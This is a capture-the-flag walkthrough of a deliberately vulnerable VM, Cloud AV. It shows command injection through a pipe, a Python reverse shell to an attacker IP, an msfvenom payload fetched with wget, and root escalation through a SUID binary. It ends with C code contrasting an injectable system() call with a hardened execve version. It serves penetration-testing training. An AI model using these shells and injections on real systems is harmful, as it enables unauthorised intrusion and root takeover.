BoredHackerBlog: Cloud AV Walkthrough

BoredHackerBlog: Cloud AV Walkthrough Vulnhub | BoredHackerBlog: Cloud AV Writeup Vulnhub

Today we solve another Vulnhub CTF, BoredHackerBlog: Cloud AV, created by BoredHackerBlog. The VM difficulty is easy; you can download it here.

Description

Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service. Currently, it’s in beta mode. You’ve been asked to test the setup and find vulnerabilities and escalate privs.

Network Scanning

The first step of the attack is to identify the target. To do so, we use the following command:

netdiscover

Now we run an aggressive port scan with nmap to gather information about the open ports and the services running on the target machine:

nmap -A 192.168.43.6

We learn from the scan that port 8080 is open, running a Python httpd service, and that port 22 (SSH) is open as well.

Enumeration

Next we start enumerating the host, so we open the Python HTTP service in a web browser. Here we find the Cloud Anti-Virus Scanner page.

http://192.168.43.6:8080

I tried many codes to log in and found that the valid invite code is Password, and we successfully logged in to the Python virus scanner server.


After logging in to the virus scanner we see many files, a placeholder input field and a scan button. I tried many reverse shell and command injection payloads and finally broke out of the jail using | to obtain a reverse Python shell.

First start your netcat listener, then paste the Python socket reverse shell payload into the input field and click the scan button to execute it:

nc -lvp 4545
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.103",4545));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

We got a reverse connection from the target machine. Moving on to enumerating the directories, I found an executable with the SUID bit set, update_cloudav:

cd /home
ls
cd scanner
ls -lsa

Here we also see the source code of the binary, update_cloudav.c. After reading the source, I created a msfvenom Python reverse shell payload and started a local Python web server on port 80:

msfvenom -p cmd/unix/reverse_python lhost=192.168.43.103 lport=4545 -f raw > shell.py
python -m SimpleHTTPServer 80

Set up the msfconsole payload listener:

msfdb run
use exploit/multi/handler
set payload cmd/unix/reverse_python
set lhost 192.168.43.103
set lport 4545
run

Using wget, I downloaded the Python reverse shell onto the target machine:

cat update_cloudav.c
wget http://192.168.43.103/shell.py

Our shell is downloaded. Now we add executable permission to the reverse shell and, again using the pipe |, execute our payload through the SUID binary with the command:

chmod +x shell.py
./update_cloudav 'hackNos|./shell.py'

We get a new session and see a blank shell. Now spawn a TTY with python3 and run the id command; we have a root shell on the target machine.

python3 -c 'import pty;pty.spawn("/bin/bash")'
id
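The root cause of this escalation is a SUID helper that hands its argument to a shell, so a | in the argument runs a second command as root. Below is an added example, not the VM's own update_cloudav.c (whose source the page does not reproduce); the echo command, function names and the allowlist are constructed stand-ins. It contrasts the unsafe string-building pattern with a version that validates the argument and execs a fixed argv with no shell in between.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: the argument is spliced into a shell command line.
 * system() hands the string to /bin/sh, so an argument such as
 * "hackNos|./shell.py" makes the shell run a second program with the
 * SUID owner's privileges. (The echo command is a constructed stand-in.) */
int update_unsafe(const char *code) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "/bin/echo updating %s", code);
    return system(cmd);
}

/* Hardened check: accept only a short allowlist of characters, so shell
 * metacharacters such as '|', ';', '$' and quotes are rejected outright. */
int validate_code(const char *code) {
    size_t n = strlen(code);
    if (n == 0 || n > 32)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)code[i];
        if (!isalnum(c) && c != '-' && c != '_' && c != '.')
            return 0;
    }
    return 1;
}

/* Hardened runner: validate, then fork and execve an absolute path with a
 * fixed argv and a minimal environment. No shell is involved, so the
 * argument is never re-parsed. Returns the child's exit status, or -1 if
 * the input was rejected or the child did not exit normally. */
int update_safe(const char *code) {
    if (!validate_code(code))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "echo", "updating", (char *)code, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/echo", argv, envp);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```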